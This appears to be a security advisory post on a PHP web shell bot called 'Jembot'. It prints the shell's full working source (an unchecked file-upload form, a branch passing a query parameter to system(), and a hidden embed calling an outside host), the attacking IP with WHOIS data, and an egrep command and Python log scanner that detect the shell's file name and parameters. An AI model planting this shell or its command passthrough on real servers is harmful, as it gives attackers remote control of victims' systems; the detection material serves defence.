We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell.php

<?php
// Branch 1: "?jembot" serves an upload form and writes the posted file next to
// the shell under its original name, with no type, size or path checks.
if(isset($_GET['jembot']))
{
    echo "<body bgcolor=black>
    <font color=cyan size=3>";
    echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
    <label for=\"file\">empix:</label>
    <input type=\"file\" name=\"file\" id=\"file\" />
    <br />
    <input type=\"submit\" name=\"submit\" value=\"uplod\">
    </form>";
    // Status strings are Indonesian/Javanese: gagal = failed, sukses = success,
    // ukuran = size, mentah = raw (temp path), wes enek = already exists, mateng = done.
    if ($_FILES["file"]["error"] > 0)
    {
        echo "gagal: " . $_FILES["file"]["error"] . "<br />";
    }
    else
    {
        echo "sukses: " . $_FILES["file"]["name"] . "<br />";
        echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "mentah: " . $_FILES["file"]["tmp_name"];
    }
    if (file_exists("" . $_FILES["file"]["name"]))
    {
        echo $_FILES["file"]["name"] . " wes enek cok. ";
    }
    else
    {
        move_uploaded_file($_FILES["file"]["tmp_name"],
            "" . $_FILES["file"]["name"]);
        echo " mateng: " . "" . $_FILES["file"]["name"];
        echo "<hr>";
    }
}
// Branch 2: the value of "?empix=" is passed straight to system().
elseif ($_GET["empix"]){
    system($_GET["empix"]);
}
// Branch 3: with no parameter, prints a fingerprint banner (OS and PHP version)
// wrapped in "empixcrew:" markers, a recognisable string for the bot to look for.
else {
    $un = php_uname();
    $sof1 = getenv("SERVER_SOFTWARE");
    $php1 = phpversion();
    echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT>

Attacks coming from IP 187.17.65.242 (Brazil).
WHOIS:
inetnum:     187.17.64/18
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.
ownerid:     001.109.184/0001-95
responsible: Contato da Entidade UOL
country:     BR
owner-c:     CAU12
tech-c:      CAU12
inetrev:     187.17.64/20
nserver:     ns1.host.uol.com.br
nsstat:      20120412 AA
nslastaa:    20120412
nserver:     ns2.host.uol.com.br
nsstat:      20120412 AA
nslastaa:    20120412
created:     20081022
changed:     20081022

nic-hdl-br:  CAU12
person:      Contato Administrativo - UOL
e-mail:      [email protected]
created:     20031202
changed:     20100106

nic-hdl-br:  SEO50
person:      Security Office
e-mail:      [email protected]
created:     20021114
changed:     20110830

We strongly recommend blocking this IP address and running the following command over your log files to detect attacks:
#egrep -n --color "hell.php" *.log
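The egrep above only matches the file name. The script below is an added example (not part of the original post) that goes a step further: it parses each access-log line, and flags a request when it comes from the IP named in the WHOIS section, targets a file named hell.php, or carries one of the two query parameters the shell branches on (jembot, empix), distinguishing a bare fingerprint probe from an actual upload POST. It assumes the server writes the Apache/nginx "combined" log format; the sample log lines are constructed for the example and are not from the original page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the page: the web shell's file name, the two query
# parameters it branches on, and the attacking IP reported in the WHOIS section.
SHELL_FILENAME = "hell.php"
SHELL_PARAMS = {"jembot", "empix"}
BLOCKED_IPS = {"187.17.65.242"}

# Apache/nginx "combined" log format (assumption: the server logs in that format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict of the interesting fields, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    parts = urlsplit(fields["target"])
    fields["path"] = parts.path
    # keep_blank_values so a bare "?jembot" (no value) is still seen as a parameter.
    fields["params"] = set(parse_qs(parts.query, keep_blank_values=True))
    return fields


def classify(fields):
    """Return the list of indicator names that match one parsed request."""
    hits = []
    if fields["ip"] in BLOCKED_IPS:
        hits.append("blocked-ip")
    if fields["path"].lower().endswith(SHELL_FILENAME):
        hits.append("shell-filename")
    if fields["params"] & SHELL_PARAMS:
        hits.append("shell-parameter")
    # The upload branch is driven by a POST; a POST to the shell file that got a
    # 200 back is the strongest sign the shell actually ran on this server.
    if fields["method"] == "POST" and "shell-filename" in hits and fields["status"] == "200":
        hits.append("upload-post")
    return hits


def scan(lines):
    """Scan log lines; return (hit_count, [(line_no, ip, target, hits), ...])."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = parse_line(line)
        if f is None:
            continue
        hits = classify(f)
        if hits:
            findings.append((n, f["ip"], f["target"], hits))
    return len(findings), findings


# Constructed sample lines (not from the original page): two benign requests, a
# fingerprint probe, a command request, an upload POST and one unparseable line.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2012:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
187.17.65.242 - - [12/Apr/2012:10:01:07 +0000] "GET /wp-content/uploads/2011/12/chase/hell.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
187.17.65.242 - - [12/Apr/2012:10:01:09 +0000] "GET /wp-content/uploads/2011/12/chase/hell.php?empix=id HTTP/1.1" 200 143 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Apr/2012:10:02:11 +0000] "GET /images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2012:10:03:30 +0000] "POST /wp-content/uploads/2011/12/chase/hell.php?jembot HTTP/1.1" 200 412 "-" "Mozilla/5.0"
garbage line that does not parse
"""

if __name__ == "__main__":
    count, findings = scan(SAMPLE_LOG.splitlines())
    print(f"{count} suspicious request(s)")
    for n, ip, target, hits in findings:
        print(f"line {n}: {ip} {target} -> {', '.join(hits)}")
```

On real data, feed `scan()` the lines of your access log instead of `SAMPLE_LOG`; a "shell-parameter" or "upload-post" hit from an IP outside the blocklist means the shell is being used from more than the one address reported here, and the "shell-filename" match on its own is what the page's egrep would have found.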